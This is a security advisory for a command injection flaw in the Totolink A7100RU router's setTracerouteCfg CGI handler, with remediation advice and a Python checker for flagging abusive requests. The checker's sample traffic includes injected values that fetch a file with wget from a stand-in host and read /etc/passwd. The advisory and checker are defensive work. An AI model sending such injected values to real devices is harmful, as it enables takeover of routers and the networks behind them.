CVE-2026-6131
Acer · Totolink A7100RU
Acer Totolink A7100RU is vulnerable to remote OS command injection via the setTracerouteCfg function in the CGI handler.
Executive summary
A critical OS command injection vulnerability in the Acer Totolink A7100RU allows a remote, unauthenticated attacker to execute arbitrary operating-system commands on the router, with the privileges of the CGI handler process.
Vulnerability
The setTracerouteCfg handler in /cgi-bin/cstecgi.cgi does not validate the command argument before it is used to build an OS command. An unauthenticated attacker who can reach the CGI endpoint can therefore embed shell metacharacters in that argument and have the injected command executed by the device.
Business impact
Rated CVSS 9.8, the flaw gives an attacker full control of the router. That control can be used to pivot into the local network behind the device, intercept or redirect traffic passing through it, and enlist the device in larger-scale attacks.
Remediation
Immediate Action: Install the fixed firmware from Acer/Totolink as soon as it is available for this model, and confirm after the update that the device reports the patched firmware version. If no fix has been published, treat the compensating controls below as mandatory.
Proactive Monitoring: Log and review requests to /cgi-bin/cstecgi.cgi, in particular any setTracerouteCfg call whose command argument contains anything other than a plain hostname or IP address, and watch for unexpected processes or outbound connections from the device that would indicate a successful injection.
Compensating Controls: Restrict access to the router's web-based management interface to authorized administrative workstations. Make sure the interface is not reachable from the WAN side (disable remote management) and limit LAN-side access to a management network or to the addresses of those workstations.
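As an added illustration of the monitoring step (not code from the advisory or from the vendor), the following Python checker classifies logged requests to /cgi-bin/cstecgi.cgi and flags setTracerouteCfg calls whose command argument could not be a plain traceroute target. Only the handler path, the function name setTracerouteCfg and the argument name command come from the advisory; the request body layout it assumes (a JSON object, or a form-encoded fallback, carrying the function name in a "topicurl" field) and the sample traffic are constructed for the example.

```python
"""Flag requests that look like abuse of setTracerouteCfg in cstecgi.cgi.

Added illustration for this advisory, not vendor code. The body layout
(JSON or form-encoded, function name in "topicurl", traceroute target in
"command") is an assumption about how the CGI handler is driven.
"""
import json
import re
from urllib.parse import parse_qs

CGI_PATH = "/cgi-bin/cstecgi.cgi"
TARGET_FUNCTION = "setTracerouteCfg"

# Characters that let a value break out of a shell command line. A genuine
# traceroute target (hostname or IP literal) never needs any of them.
SHELL_META = re.compile(r"""[;&|`$(){}<>\r\n\\'"]""")
# Conservative shape of a benign target: hostname labels, IPv4 or IPv6.
BENIGN_TARGET = re.compile(r"^[A-Za-z0-9.:\-]{1,253}$")

# Constructed sample traffic (method, path, body), as a reverse proxy or a
# capture in front of the router might record it. All bodies are made up.
SAMPLE_REQUESTS = [
    ("POST", CGI_PATH, '{"topicurl":"setTracerouteCfg","command":"example.com"}'),
    ("POST", CGI_PATH,
     '{"topicurl":"setTracerouteCfg","command":"8.8.8.8; wget http://198.51.100.7/x -O /tmp/x"}'),
    ("POST", CGI_PATH, "topicurl=setTracerouteCfg&command=8.8.8.8%7Ccat%20%2Fetc%2Fpasswd"),
    ("POST", CGI_PATH, '{"topicurl":"getSysStatusCfg"}'),
    ("GET", "/index.html", ""),
]


def parse_body(body):
    """Return the request body as a dict: JSON first, form-encoded fallback."""
    try:
        obj = json.loads(body)
        return obj if isinstance(obj, dict) else {}
    except ValueError:
        # parse_qs also percent-decodes, so encoded metacharacters surface here
        return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def classify(method, path, body):
    """Return (verdict, reason); verdict is "ignore", "benign" or "suspicious"."""
    if path.split("?", 1)[0] != CGI_PATH:
        return "ignore", "not the CGI handler"
    fields = parse_body(body)
    if fields.get("topicurl") != TARGET_FUNCTION and TARGET_FUNCTION not in body:
        return "ignore", "other CGI function"
    command = str(fields.get("command", ""))
    if SHELL_META.search(command):
        return "suspicious", f"shell metacharacter in command argument: {command!r}"
    if not BENIGN_TARGET.match(command):
        return "suspicious", f"command argument is not a plain host: {command!r}"
    return "benign", f"traceroute target {command}"


def scan(requests):
    """Classify every (method, path, body) record; returns (index, verdict, reason)."""
    return [(i, *classify(*req)) for i, req in enumerate(requests)]


if __name__ == "__main__":
    for index, verdict, reason in scan(SAMPLE_REQUESTS):
        print(f"request {index}: {verdict:<10} {reason}")
```

The check deliberately flags anything that is not a bare hostname or address rather than matching a list of known payloads, so an encoded or unusual injection is still caught; the form-encoded fallback matters because parse_qs percent-decodes the value before the metacharacter test runs.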
Exploitation status
Public Exploit Available: True
Analyst recommendation
Because the flaw is reachable without authentication and a public exploit exists, treat remediation as urgent: update the device firmware, remove any WAN exposure of the management interface, and check devices that were exposed for signs of prior compromise before trusting them again.